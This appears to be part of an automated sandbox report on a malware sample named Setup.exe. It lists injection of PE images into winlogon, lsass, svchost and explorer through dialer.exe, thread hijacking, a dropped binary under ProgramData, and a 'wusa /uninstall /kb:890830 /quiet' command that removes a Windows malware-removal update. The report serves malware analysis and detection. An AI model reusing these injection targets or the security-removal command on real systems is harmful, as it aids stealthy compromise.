          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6A4D273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 2313273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\explorer.exe EIP: 253273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 497A273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: AA92273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: FBE5273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 44E5273C
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1C8F78F0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 1BA8E920000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 12E36FA0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 28F8AE40000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1C8F7960000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 1BA8E980000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 12E37000000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 28F8AE70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C35FA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B3B9390000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23368CB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28B68F30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29BC8180000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29D50F40000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB7D2C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E9297D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A183790000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D564190000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CF6D790000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C2551B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 171ACBC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 283C6530000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF39B80000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D500190000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257B5780000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EAC63D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20428C60000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15222280000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16D24BB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 163535B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14DE2730000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B3122B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 7A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184E1BC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 211FEB70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28F03C70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F3D2900000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22EB90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17780D60000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1647B460000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 224D0D90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B924FB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1570D1F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1879E9D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 197DB9C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF6FFB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 229F9BD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1392A290000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 177AD190000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 227FBAE0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20620920000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27AAC950000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 167425D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 234F1060000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1A0BCB20000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 28092350000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1586A4D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2E523130000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 2530000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D497A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22AAA920000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FEFBE50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F044E50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 26AF0680000 value starts with: 4D5A
          Injects code into the Windows Explorer (explorer.exe)
          Source: C:\Windows\System32\dialer.exeMemory written: PID: 4380 base: 2530000 value: 4D
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeThread register set: target process: 7144Jump to behavior
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeThread register set: target process: 7112
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeThread register set: target process: 7120
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeThread register set: target process: 6444
          Writes to foreign memory regions
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1C8F78F0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 1BA8E920000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 12E36FA0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 28F8AE40000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\dwm.exe base: 28F8ADF0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1C8F7960000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 1BA8E980000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 12E37000000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 28F8AE70000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C35FA0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B3B9390000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23368CB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28B68F30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29BC8180000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29D50F40000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB7D2C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E9297D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A183790000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D564190000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CF6D790000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C2551B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 171ACBC0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 283C6530000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF39B80000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D500190000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257B5780000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EAC63D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20428C60000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15222280000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16D24BB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 163535B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14DE2730000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B3122B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 7A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184E1BC0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 211FEB70000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28F03C70000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F3D2900000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22EB90000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17780D60000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1647B460000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 224D0D90000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B924FB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1570D1F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1879E9D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 197DB9C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF6FFB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 229F9BD0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1392A290000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 177AD190000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 227FBAE0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20620920000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27AAC950000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 167425D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 234F1060000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1A0BCB20000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 28092350000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1586A4D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2E523130000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 2530000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D497A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22AAA920000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FEFBE50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F044E50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 26AF0680000
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\dialer.exeCode function: 41_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,41_2_0000000140001B54
          Source: C:\Windows\System32\dialer.exeCode function: 41_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,41_2_0000000140001B54
          Source: dwm.exe, 00000039.00000000.1417995604.0000028F8575A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: winlogon.exe, 0000002F.00000000.1402626818.000001C8F7DB1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000039.00000000.1419095064.0000028F85B94000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: winlogon.exe, 0000002F.00000000.1402626818.000001C8F7DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: winlogon.exe, 0000002F.00000000.1402626818.000001C8F7DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: bProgram Manager]
          Source: winlogon.exe, 0000002F.00000000.1402626818.000001C8F7DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\dasHost.exeCode function: 131_2_00000280923942F0 cpuid 131_2_00000280923942F0
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
